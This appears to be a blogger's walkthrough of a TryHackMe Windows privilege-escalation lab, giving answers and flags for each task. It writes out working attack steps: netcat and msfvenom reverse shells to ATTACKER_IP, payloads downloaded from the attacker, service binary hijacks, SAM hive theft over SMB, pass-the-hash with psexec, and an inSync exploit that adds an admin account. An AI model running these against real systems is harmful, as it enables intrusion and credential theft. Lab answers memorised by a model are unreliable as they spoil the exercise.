It is time to look at the Windows Privilege Escalation Room on TryHackMe, a medium level room in which we learn how to escalate our privileges on Windows machine. I don’t know about you but I am looking forward to this one. I have historically been stronger on looking at Linux machine, so there is a bunch to learn.
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Task 1: Introduction
During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.
This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.
If you want to brush up on your skills first, you can have a look through the Windows Fundamentals Module or the Hacking Windows Module.
Answer: No answer needed
Task 2: Windows Privilege Escalation
Some quick theory here. Let’s get these questions answered and move on.
Users that can change system configurations are part of which group?
Answer: Administrators
The SYSTEM account has more privileges than the Administrator user (aye/nay)
The system account has full access to all files and resources available on the host with even higher privileges than administrators.
Answer: aye
Task 3: Harvesting Passwords from Usual Spots
The main point to learn in this tasks is that there are plenty of places to look for passwords on a Windows system. Examples covered here are Unattended Installation config files, Powershell History, saved Windows credentials, IIS configuration files, and saved credentials from software such as PuTTY. Let’s move on.
A password for the julia.jones user has been left on the Powershell history. What is the password?
To read the Powershell history we enter the following command:
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
There on line 6 we find her password.
Answer: ZuperCkretPa5z
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
According to the task, there are two possible locations where we can find these web.config files:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
The first one does not exist on the system, but if we run the command with the second location we find a connectionString:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
To be exact, we find this, including the password:
<add connectionString=”Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3″ name=”THM-DB” />
Answer: 098n0x35skjD3
There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
The instructions tell use exactly what to do. Start with cmdkey to see for which users we have saved credentials:
cmdkey /list
Sure enough, we have a saved credential for mike.
Now run the following command to run cmd with his credentials:
runas /savecred /user:mike.katz cmd.exe
There we go. Now find the flag on mike.katz’s Desktop:
Answer: THM{WHAT_IS_MY_PASSWORD}
Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
This one is also literally described in the task. Run the following command to search under the following registry key for ProxyPassword:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Cool pass, indeed!
Answer: CoolPass2021
Task 4: Other Quick Wins
This task is all about abusing Task Scheduler tasks that have been configured to run an executable file that we can change to run a netcat reverse shell.
What is the taskusr1 flag?
Let’s start by getting info on the scheduled task called “vulntask”.
schtasks /query /tn vulntask /fo list /v
As discussed in the task description, we can edit the file if have the correct permissions. To check these we run the following command:
icacls c:\tasks\schtask.bat
Now all we need to do is echo the nc64 command to the schtask.bat file to overwrite its content. Remember to change the ip.
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
And setup a listener on your attacker machine:
nc -lvnp 4444
Finally, run the scheduled task with:
schtasks /run /tn vulntask
And yes, we got a connection:
And find the flag:
Answer: THM{TASK_COMPLETED}
Task 5: Abusing Service Misconfigurations
This part covers three different service misconfigurations, and each vulnerability has a question related to it.
Get the flag on svcusr1’s desktop.
Once again, we can follow the steps from the covered theory:
sc qc WindowsScheduler
The binary path is mentioned. Now we check the permissions:
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
The Everyone group has modify permissions (M) on the service’s executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.
Now we need to fulfil the following tasks:
- Create a reverse shell payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe - Setup a Python web server:
python3 -m http.server
3. Get the binary from the attacker machine into the target
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
4. On the target machine, rename the original binary, move the payload to its location and give the right permissions (making sure you are using Powershell):
cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
5. On your attacker machine, setup a reverse listener:
nc -lvnp 4445
6. On the target machine, startup the task:
sc stop windowsscheduler
sc start windowsscheduler
7. Startup a listener and receiving a shell:
And there we can the flag:
Answer: THM{AT_YOUR_SERVICE}
Get the flag on svcusr2’s desktop.
Now it is time to abuse Unquoted Service Paths. The process is quite similar. We place a binary in a place that gets called due to a Task Scheduler task not correctly specifying its BINARY_PATH:NAME (not using double quotes), causing our payload to be called instead. Again , we need to build a payload with msfvenom, download it from our attacker machine, setup a listener, and start the scheduled task.
The problem is with the following task:
sc qc "disk sorter enterprise"
If we check the permissions on the binary file location we can see that we have writing privileges:
icacls c:\MyPrograms
There we can do as follows on our machine:
# Create payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
# Setup a server
python3 -m http.server
Then we download the file on our target machine:
wget http://ATTACKER_IP:8000/rev-svc2.exe -O rev-svc2.exe
Setup a listener on our attacker machine:
# Setup listener
nc -lvp 4446
Move the file and give it permissions:
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
And start and stop the task:
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
And we got a reverse shell:
As before, find the flag on svcusr2’s desktop located at C:\Users\svcusr2\Desktop.
Answer: THM{QUOTES_EVERYWHERE}
Get the flag on the Administrator’s desktop.
You know the drill by now. It is very similar to the last two questions:
- Create a payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe - Start a server:
python3 -m http.server - Start a listener:
nc -lvp 4447 - Download the file from Powershell:
wget http://10.10.121.104:8000/rev-svc3.exe -o rev-svc3.exe
5. Grant permissions:
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
6. In your cmd configure the binPath:
sc config THMService binPath= “C:\Users\thm-unpriv\rev-svc3.exe” obj= LocalSystem
7. Stop, and start the service:
sc stop THMService
sc start THMService
You should have received a reverse shell:
Now find the flag on the administrator’s desktop:
Answer: THM{INSECURE_SVC_CONFIG}
Task 6: Abusing dangerous privileges
Get the flag on the Administrator’s desktop.
In this task, we can decide between three different methods: SeBackup / SeRestore, SeTakeOwnership, SeImpersonate / SeAssignPrimaryToken. I will pick the Backup route as it seems to involve of a few techniques I find great to learn.
RDP into the target machine, for example by using Remmina on your AttackBox. When logged in you can go ahead and run a command prompt as administrator.
You should now be able to see your privileges with the command:
whoami /priv
Bypass traverse checking allows to backup SAM and SYSTEM hashes with the following commands:
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
Make sure the backups are in the directory:
Now we need to get it over to your AttackBox. We can do by using SMB. We can use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox.
Run the following commands:
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Tip: I had problems with impacket warning me that the address already was in use. In this case run the following commands and try again:
sudo lsof -i :445
# If this command shows a process using port 445 (the default SMB port), note its PID.
sudo kill -9 <PID>
Now run the following commands to copy the backups to your attacker machine.
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
We can now use impacket to retrieve the users’ password hashes:
cd share
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Finally, we can do a Pass-the-Hash attack by passing the Administrator hash in the following command (please use the correct hash if it does not fit your results):
python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.1.125
Now we only need to find the flag on the Administrator’s Desktop:
There we go!
Answer: THM{SEFLAGPRIVILEGE}
Task 7: Abusing vulnerable software
The final practical task to complete in this room, and it’s a short one. Let’s go. We are in the endgame now.
Get the flag on the Administrator’s desktop.
The theory mentions the following exploit:
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
All we need to do is run this exploit on the target machine in a Powershell console.
The exploit will create user pwnd
with a password of SimplePass123
and add it to the administrators’ group. If the exploit was successful, we should be able to run the following command to verify that the user exists and is part of the administrators’ group:
net user pwnd
This is the case. Now we can run a command prompt as administrator. When prompted for credentials, use the pwnd account.
From the new command prompt, you can retrieve your flag from the Administrator’s desktop with the following command:
type C:\Users\Administrator\Desktop\flag.txt
There we have it 🙂
Answer: THM{EZ_DLL_PROXY_4ME}
Congratulations, we are done! Tasks 8 and 9 do not have any assignments so we will not cover those.
It was great to learn some Windows Privilege Escalations techniques and I hope you learned at least as much as I did.
See you next time. Happy hacking!
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: